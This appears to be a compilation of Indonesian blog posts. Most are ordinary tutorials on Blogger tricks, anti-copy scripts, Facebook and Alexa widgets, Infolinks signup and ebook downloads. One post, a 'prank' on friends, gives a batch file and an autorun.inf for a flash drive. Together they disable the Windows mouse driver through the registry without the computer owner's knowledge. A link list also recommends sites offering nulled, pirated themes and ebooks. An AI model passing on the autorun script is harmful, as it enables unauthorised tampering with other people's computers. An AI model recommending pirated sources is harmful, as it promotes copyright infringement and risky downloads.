Menghalangi Sang Pencuri Posting yang menggunakan tombol CTR + C

Trik ini sebenarnya sama dengan trik saya pada postingan yang berjudul membuat postingan anti maling atau anti copy paste kemarin yaitu sama - sama mendisable Klik kanan. Tapi Pada posting kali ini ada penambahannya yaitu mendisable CTR + C, bagi yang tidak tau apa itu CTR + C gak usah bingun karena CTR + C yaitu tombol cepat dari Copy.

Dan untuk triknya bisa sobat lihat di bawah ini.
1. Jangan lupa untuk login terlebih dahulu ke Blogger.com
2. Pilih "rancangan" atau "template" > Edit HTML lalu cari kode (dengan menekan Ctrl+F atau F3)
3. Tambahkan kode dibawah ini ke dalam kode atau bisa juga di ganti sekalian

<body oncontextmenu=’return false’ onmousedown=’return false’ onselectstart=’return false’ onkeypress=’return false’>

Berikut ini penjelasan dari kode diatas


oncontextmenu=’return false’ (untuk mematikan klik kanan mouse)
onmousedown=’return false’ (untuk mematikan klik blok ke bawah)
onselectstart=’return false’ (untuk mematikan seleksi blok)
onkeypress=’return false’ (untuk mematikan tombol keyboard)

Mengganti akun blogger lama dengan akun blogger yang baru

Mungkin bagi para blogger perna mempunyai keinginan untuk mengganti email login blog dan mencari cari dilayanan blogger tapi yang terdapat hanya fasilitas untuk mengganti password blog.
Jika memang kondisinya seperti itu maka untuk mengganti alamat email login blog perlu dibutuhkannya sebuah trik.

Untuk tutorialnya silakan baca disini:

1. Buat alamat gmail yang baru atau guanakan gmail yang sudah ada, yang akan digunakan untuk login.
2. Masuklah ke akun blogger yang lama dengan email login saat ini
3. Kliik Pengaturan -> Izin.
4. Klik tombol Menambah Penulis.
5. Undanglah akun baru anda untuk menjadi penulis.

Langkah selanjutnya untuk akun yang baru

1. Masuklah ke email "bukan blogger" akun baru anda, agar tidak repot - repot login logout terus, gunakanlah  dua browser. Contoh: Email lama memakai Mozilla dan akun yang baru memakai Google Chrome
2. Bukalah email yang berisi undangan dan konfirmasikan kesediaan anda untuk menjadi penulis pada blog milik anda
3. Lalu ikuti langkah-langkah selanjutnya yang diberikan
Kembali ke akun yang lama
4. Refresh halaman Pengaturan -> Izin, anda akan mendapati akun baru dan anda sudah menjadi penulis pada blog anda
5. Berikan admin previleges pada akun baru dengan menekan "berikan previlese admin"
6. Setelah itu keluarlah "logout"

Masuk ke akun baru blogger anda

1. Pilih Pengaturan -> Izin
2. Di situ anda akan menemukan dua akun penulis, yaitu akun lama dan akun baru
3. Hapuslah akun lama, sehingga satu-satunya penulis blog anda adalah hanya akun baru
4. Apabila anda ingin masuk atau login ke blog tersebut, anda harus menggunakan email akun yang baru

melacak kamera yang dicuri maling kelas teri

Bukanlah hal yang aneh lagi bila Anda kehilangan kamera kesayangan Anda, entah karena ketinggalan disuatu tempat atau dicuri oleh orang. Apabila hal ini terjadi, apa yang bisa Anda lakukan ? Pasrah ? 
namun kini Anda bisa melacak pencuri yang mencuri kamera anda dengan trik ini.

Masuk ke website www.stolencamerafinder.com website ini yang akan melacak serial number yang digunakan oleh kamera Anda. Tanpa Anda sadari, sebenarnya didalam metadata foto yang Anda ambil terdapat sebuah serial number dari kamera dan website ini akan mencari hasil foto dengan serial number yang sama. Artinya foto tersebut diambil dengan kamera yang sama. Tentu saja sebelumnya anda harus berharap bahwa sang pencuri meng-upload hasil fotonya ke internet. Namun kekurangan dari metode ini adalah tidak semua jenis kamera memasukkan kode serial number ini.

sumber:http://jasakom.com/

Kumpulan situs belajar edukasi

  Berikut beberapa referensi belajar tentang dunia komputer dari mulai bookmark site sampe logika

1. http://Google.com inilah mbah segala tahu

2. http://www.w3schools.com tempat sekolah online dan gratis buat yang mau mempelajari web programming, web developer etc. Web ini salah satu referensi terlengkap buat belajar pemrograman website, mulai dari tutorial HTML tingkat dasar, scripting language pada sisi client seperti (javascript, HTML DOM, vbscript), server side (PHP, SQL), tutorial membangun web dari awal.

3. https://developers.facebook.com/docs masih tentang web programming, bagi yang ingin membuat facebook apps (aplikasi facebook), atau sekedar pengen mempelajari facebook API, situsnya para developer facebook ini menjadi referensi wajib yang harus dikunjungi.

4. Mozilla firefox->klik kanan-> view page source= jika sudah mengerti bahasa scripting, coba obok-obok source halaman situs yang ada, disitu tersimpan banyak rahasia

5. Hackertest.net Situs buat simulasi hacking (tempat latihan hacker). Jika mendambakan sosok seorang hacker dan punya cita cita menjadi seorang hacker, silahkan test kemampuan hacking disini. disitus ini ada 20 level, dari mulai memecahkan password buat login sampe memecahkan kode kode enkripsi..

5. Boygj.com tempat download Nulled template atau themes website hasil bajakan. seperti themes wordpress dari eleganthemes, ..

6. Scriptmafia.org situs ini juga tempat nongkrongnya barang-barang nulled, kayak ebook, themes, etc.

7. github.com 1 juta proyek sudah di-hosting oleh GitHub, semenjak diluncurkan pada Februari 2008. GitHub adalah layanan hosting berbasis web yang menampung proyek-proyek yang menggunakan sistem Git revision control. Git sendiri, awalnya dirancang dan dikembangkan oleh Linus Torvalds untuk pengembangan kernel Linux. intinya kita bisa menemukan banyak script2 sebagai referensi.

8. file help -> jika agan menghadapi suatu software, entah itu sistem operasi, ato software aplikasi, ato aplikasi berbasis web, sebelum bertanya jangan lupa cari dan pelajari file help-nya.

9. ilmukomputer.org

10. kaskus.us forum terbesar, disini banyak member  yang siap membantu memecahkan permasalahan anda.

11. jasakom.com salah satu komunitas hacker tertua di Indonesia, banyak teknik-teknik hacking dishare disini. Dan sebagai catatan komunitas xcode yogyafree juga pertama tumbuh dari jasakom.

12. xcode.or.id salah satu komunitas hacker Indonesia yang berbasis di kota Yogyakarta dan sekarang sudah memiliki cabang hampir diseluruh kota Indonesia.

13. http://devilzc0de.org/foru​m komunitas hacker Indonesia.

14. http://elearning.gunadarma.ac.id/index.php?option=com_wrapper&Itemid=36 materi sekolah dan kuliah bisa ditemukan disini

15. http://www.softinsys.com ini juga kalo mau belajar bahasa pemprograman computer.

16. http://duniadownload.com ini adalah site yang berguna sekali sagala ebok ada di situ. 

17. http://www.black-c0de.org 

beasiswa dari google sebesar 68 juta rupiah

JAKARTA, KOMPAS.com - Google memberi kesempatan kepada para mahasiswa / mahasiswi( sarjana, om atau doktor ), peneliti dan akademisi untuk melakukan penelitian seputar internet di Indonesia. Tema dari penelitian ini adalah kebebasan berekspresi dan partisipasi masyarakat.

Jika Anda tertarik dengan isu tersebut, maka cobalah melamar di program Indonesian Google Policy Fellowship yang diselenggarakan oleh Indonesian ICT Partnership Association (ICT Watch).

Satu orang fellow ( penerima beasiswa ) yang terpilih akan dibekali uang saku untuk penelitian sebesar kurang lebih Rp 68 juta ( 7500 dollar AS ).

Topik yang akan diteliti tentang seputar kebebasan, hak asasi manusia ( HAM ), keamanan internet, transparansi pemerintah, ICT untuk perempuan dan usaha kecil menengah. Namun, penelitian ini tidak terbatas pada topik - topik yang telah disebutkan. Peserta bisa mengajukan topik lain selagi relevan dengan tema yang diusung.

Jika nanti terpilih, peserta akan mengikuti kegiatan penuh waktu di ICT Watch selama 10 minggu yang dibagi dalam 2 periode.

Proposal penelitian bisa dikirim melalui email ke alamat: google.fellowship@ictwatch.com sebelum 15 Mei 2012. Semua aplikasi yang diajukan ditulis dalam bahasa Inggris.

Informasi lebih lanjut terkait syarat dan ketentuan bisa dilihat di situs resmi ICT Watch. 
Selamat mencoba dan sukses selalu!

Ebook Tutorial Belajar Matlab

Buat yang mencari ebook untuk belajar matlab disini saya sediakan ebooknya dari teguh widiarsono,M.T
na jika tertarik untuk mendownloadnya silakan saja langsung didownload biar gak kelamaan.
sebenarnya ebook ini semua koleksi pribadi namun saya upload disamping mencegah terjadinya data hilang karena kebiasaan saya yang sering FIU komputer saya.

ebook tutorial praktis belajar matlab

Jailin teman dengan disable mouse lewat flashdisk

Kali ini blog ngawean akan membagikan trik jail buat yang suka jailin komputer teman anda.trik ini saya dapatkan dari forum yang saya ikuti.
trik ini digunakan untuk mendisable mouse.

Untuk kodenya silakan copy di notepad dan simpan dengan extension ".bat" disini saya simpan filenya dengan menggunakan nama "mousedis.bat"

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
     reg delete %key%
     reg add %key% /v Start /t REG_DWORD /d 4

Kemudian buat file autorun.inf dengan notepad

[autorun]
Open=mousedis.bat
Action=Mouse Disable


Untuk mengembalikannya seperti semula buat file ".bat" dan copy codenya lalu jalankan.

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\S ervices\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1











sumber artikle: disable mouse teman dengan memasukkan flashdisk

ebook panduan belajar css untuk pemula

kali ini ngawean akan membagikan ebook yang membahas tentang panduan belajar CSS untuk tingkatan dasar, ebook ini didapat saat mengikuti mata kuliah pemrograman web, meski ebook ini berbahasa inggris namun materi yang dikandungnya cukup bagus bahkan bisa dimengerti bagi yang tidak begitu pandai dalam bahasa inggris dan bagi yang benar - benar tidak tau bahasa inggris dengan memanfaatkan web andalan yaitu google translate.
ini cover ebooknya
beginning css web development

untuk mendownload ebooknya klik disini ebook css

membuat posting anti maling atau anti copy paste

Membuat blog anti klik kanan,anti copy paste, kali ini blog ngawean membagikan tutorial blogspot yang membahas tentang membuat anti klik kanan,membuat blog anti copy paste,disable your right click, mungkin lebih tepatnya mematikan klik-kanan untuk menghindari peng-copy paste-an artikel dari suatu blog ke blog lain. Manfat dari membuat anti klik-kanan pada suatu blog itu banyak, terutama dalam urusan SEO,karena jika suatu artikel di copy paste dari suatu blog ke blog lain, maka kedua blog yang di copy maupun blog yang mem-paste akan berkurang nilai SEO blog tersebut di mata search engine, terutama search engine Yahoo yg pengecekannya dilakukan secara manual oleh tenaga manusia. Yang berakibat menurunnya traffic,pagerank dan alexa rank suatu blog. Yang mana walaupun blog yg meng-copy menyebutkan blog sumber artikel berasal, itu hanya untuk pengunjung saja memberitahu.
Tapi ada satu hal yg perlu dicatat baik-baik sebelum membuat anti copas pada blog anda yakni perlu gak blog kita diberi kode anti copy paste.
Jika blog kamu bertemakan sama kayak blog ngawean ini atau sejenisnya maka sebaiknya jangan, karena berisi tentang tutorial kode yg memang harus di copy.

Jika ingin membuat blog anti copas bisa ikuti cara berikut ini:
Ada dua script yg bisa kamu pake menurut keperluan dari blog kamu, diantaranya:

Script anti copy paste dengan disable klik kanan.
script anti copy paste yang bisa klik kanan.

1. SCRIPT ANTI COPAS DENGAN DISABLE KLIK KANAN

Script yang pertama ini berguna untuk membuat blog anti copas plus men-disable klik kanan, jadi pengunjung tidak bisa membuka tab baru dengan klik kanan diatas link ''Open in New Tab'', caranya: tempatkan script di bawah ini pada widget HTML/javascript pada blog kamu.

  • login ke dashboard blogspot kamu.
  • pilih Rancangan/Desain
  • pada halaman element laman klik ''tambah gadget'' atau ''Add gadget''
  • pilih widget HTML/javascript
  • dan pastekan script berikut didalamnya.
  • klik SIMPAN
script yang dicopy
<script language="javascript"> <!-- Begin function shake(n) { if (parent.moveBy) { for (i = 10; i > 0; i--) { for (j = n; j > 0; j--) { self.resizeTo(250,150); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); parent.moveBy(0,i);}}}} // End --> PopUpURL = "Maaf anda tidak di boleh klik kanan"; isIE=document.all; isNN=!document.all&&document.getElementById; isN4=document.layers; if (isIE||isNN) { document.oncontextmenu=checkV; } else { document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP); document.onmousedown=checkV; } functioncheckV(e) { if (isN4) { if (e.which==2||e.which==3) { dPUW=alert("Maaf anda tidak di perbolehkan klik kanan"); shake(2); return false; } } else { dPUW=alert(PopUpURL); shake(2); return false; } } </script>

ganti tulisan yang dicetak tebal sesuai kehendak

2. SCRIPT ANTI COPAS YANG BISA KLIK KANAN

Untuk script yang kedua ini berguna untuk membuat blog anti copy paste yang bisa klik kanan. Jadi pengunjung bisa membuka halaman blog anda dengan klik kanan ''Open in New Tab".
caranya: Tempatkan script berikut diantara kode <head> dan kode </head> di dalam template kamu.
script yang dicopy
<SCRIPT type='text/javascript'> if (typeof document.onselectstart!=&quot;undefined&quot;) { document.onselectstart=new Function (&quot;return false&quot;); } else{ document.onmousedown=new Function(&quot;return false&quot;); document.onmouseup=newFunction (&quot;return true&quot;); } </SCRIPT>

Ebook Membangun Data Warehouse

Buat yang mau belajar data warehouse disini saya sediakan ebook yang judulnya Building a Data Warehouse.
Untuk materinya sangat lengkap dan terdapat contoh - contoh membangun sebuah data warehouse dengan menggunakan MySQL.
ini sampul ebooknya
ebook data warehouse

jika berminat silakan download filenya disini Building a Data Warehouse

Cara menambahkan posting automatis ke halaman facebook

Dengan menggunakan aplikasi RSS Graffiti kita tidak perlu repot-repot untuk masuk ke facebook ketika akan membagikan sebuah tautan ke dinding halaman yang kita kelolah. Hal ini dikarenakan RSS Graffiti akan secara otomatis mengirimkan tautan tersebut apabila terdeteksi ada artikel baru yang diterbitkan pada blog yang kita kelola. Untuk menggunakan dan memanfaatkan aplikasi RSS Graffiti, langkah-langkahnya sebagai berikut ini:

  1. Login ke akun Facebook Anda
  2. Buka URL ini http://apps.facebook.com/rssgraffiti/
  3. Berikan otorisasi pada RSS Graffiti dengan mengklik tombol "Click HERE to authorize RSS Graffiti"
  4. rss graffiti
  5. Maka anda akan dibawah kehalaman Aplikasi klik tombol "Ke Aplikasi" untuk melanjutkan proses.
  6. aplikasi rss
  7. Klik izinkan untuk proses selanjutnya
  8. izinkan aplikasi
  9. Klik "OK"
  10. ok
  11. klik "yes"
  12. yes
  13. Klik "Add New Publishing Plan" atau tanda +
  14. rss feed
  15. Isi kolom yang ditampilkan dengan terserah anda emang gua pikirin.hahaha dan klik "Create Publishing Plan"
  16. nama rss
  17. maka akan ditampilkan gambar seperti ini
  18. add new
  19. Klik "Add New" masukkan URL Feed anda lalu klik "Add Source" untuk targetnya pilih halaman yang akan anda gunakan untuk tautan blog anda dan klik "ON"

Note:

jika anda tidak tahu URL Feed anda silakan buka web/blog anda di mozilla kemudian klik kanan pilih View Page Info klik Feeds Copy URL Feed yang ditampilkan.

Menambahkan widget like box facebook ke blogspot

untuk memasang like box pada halaman blog, maka terlebih dulu Anda harus membuka Halaman Pengembang Facebook untuk mendapatkan kode plugin like box Anda. Dimana langkah-langkahnya adalah sebagai berikut:

  • Masukkan URL Halaman Facebook atau Fans Page yang Anda kelola kemudian tentukan setelan untuk tampilan like box. Misalnya: mengatur ukuran lebar, tinggi, warna, maupun elemen yang akan ditampilkan pada like box.
  • kolom like box
  • Klik tombol "Get Code" untuk mendapatkan kode plugin like box pilih yang "IFRAME" supaya lebih muda
  • code plugin like box
  • Copy kode plugin like box Anda, kemudian masuk ke "Dasbor Blogger", klik menu "Tata Letak" (Layout), klik "Tambah Gadget". Untuk gadget yang ditambahkan adalah "HTML/JavaScript" paste code plugin tadi.

cara mendaftarkan blog ke alexa dan memasang code alexa ke blog

Mendaftarkan blog di Alexa merupakan salah satu cara untuk mendapatkan audit dasar untuk mengetahui perkembangan traffic blog atau website.
Berikut langkah-langkah pendaftaran blog/website di Alexa secara detail:
  • Masuk ke Alexa.com
  • Kemudian pilih tab "Site Tools" geser ke paling bawah
  • Klik "Claim Your Site"
  • Masukkan url blog atau website anda, kemudian klik "Claim your site".
  • Daftar terlebih dahulu untuk login, atau bisa langsung login dengan account Facebook.
  • Akan ditampilkan menu "plans and pricing" silakan pilih yang free sign up jika ingin menggunakan gratisan tapi fasilitasnya sangat minim
  • Kemudian masuk ke halaman verifikasi. Ada dua cara, yaitu dengan mengupload HTML ke direktori root blog (ini jika anda punya hosting sendiri) atau memasukkan meta key Alexa yang terdapat pada opsi kedua. Gunakan opsi kedua agar lebih cepar dan mudah. Caranya: copy meta key-nya dan paste di template HTML anda. Letakkan di bawah <head> atau diatas </head>, Kemudian save template.
  • Kembali ke halaman Alexa dan klik 'Verify my meta tag'. Jika berhasil akan ada informasi yang menunjukkan bahwa anda telah berhasil meng-klaim blog anda.

Cara daftar infolink untuk blog indonesia

Infolinks merupakan salah satu sumber penghasilan online blog ini. Infolinkstermasuk jenis PPC (Pay Per Click), hebatnya Infolinks, kita tidak perlu menyediakanspace di blog kita, Infolinks menempatkan iklan mereka pada text – text yang terdapat dalam blog/website, sehingga terlihat seperti bukan iklan melainkan linkbiasa. Dengan keunggulan tersebut peluang visitor meng click iklan Infolinkssemakin besardengan begitu earning juga akan bertambah.Sebenarnya infolinks tidak menerima publisher dengan blog bahasa indonesia,mereka hanya menerima blog dengan bahasa inggris saja. Namun dengan tips yangsaya berikan pada postingan ini, blog bahasa indonesia pun bisa menjadi publisherinfolinks.

Cara Daftar Infolinks :

  • Klik disini untuk mendaftar disitus infolinks
  • Lengkapi semua form yang tersedia
  • klik Continue (Lakukan registrasi seperti biasa)

Persiapan Blog Untuk Daftar Infolinks:
Sekarang saatnya mempersiapkan blog yang akan menjadi publisher infolinks,karena infolinks belum menerima blog bahasa indonesia, maka mau tak mau blog bahasa indonesia anda harus diset dulu biar jadi blog bahasa inggris. Anda tidak perlu menguasai bahasa inggris untuk mendaftar di infolinks.Cara ini berdasarkan pengalaman pribadi saya mendaftarkan blog ngawean@blogspot.com keinfolinks.

Baiknya anda menonaktifkan dulu segala widget/gadget yang terdapat pada blog anda ketika mendaftar di infolinks. Nantinya begitu blog anda diterima anda bisa mengaktifkan kembali semua widget/gadget yang anda gunakan. anda bisa setting itu melalui :
Blogspot
: Login ke blogger→pilih pengaturan→format→lalu pilih 1 posting dilaman utama
WordPress
: Login ke dashboard→pilih Setting→Reading→Blog pages show atmost pilih 1 Post



Bagaimana jika saya pernah mendaftarkan blog saya ke infolinks namun ditolak?
Bagi anda yang pernah mendaftar di infolinks namun ditolak, silahkan anda ikuti panduan
Persiapan Blog Untuk Daftar Infolinks setelah blog anda siap, silahkan anda mengirim sebongkah email ke support@infolinks.com menyatakan bahwa blog anda telah memenuhi syarat untuk menjadi publisher infolinks. Kirim emailnya gunakan bahasa inggris.
Untuk integrasi infolinks di blog anda silahkan lihat di
cara setting infolinks di blogspot dan wordpress

Selamat mencoba dan semoga bermanfaat

tips dan trik download video dari youtube tanpa menggunakan software

kali ini saya akan membagikan trik mendownload video dari youtube tanpa perlu menginstal software downloader seperti idm yang paling populer.
trik ini hanya digunakan untuk browser google chrome jadi jika anda menggunakan mozilla maka trik ini tidak bisa deterapkan disana,untuk solusinya anda bisa download google chrome terlebih dahulu....
langsung saja praktekin trik ini.
  • klik url ini untuk mendownload plugin yang dibutuhkan www.chromeextensions.org
  • ika extensi chrome youtube donwloader sudah terbuka kemudian klik tombol add to chrome
  • setelah proses penginstallan selesai silakan setting pengaturan yang muncul sesuai dengan selera kalian masing - masing, atau jika kebingungan silakan pilih yang "klasik download"
  • setelah selesai silakan buka video dari youtube yang ingin kalian download dan nanti akan ada menu download, kemudian silakan tentukan sendiri format apa yang ingin kalian download.
cukup sekian trik yang saya berikan semoga trik ini bermanfaat buat sobat netter semua.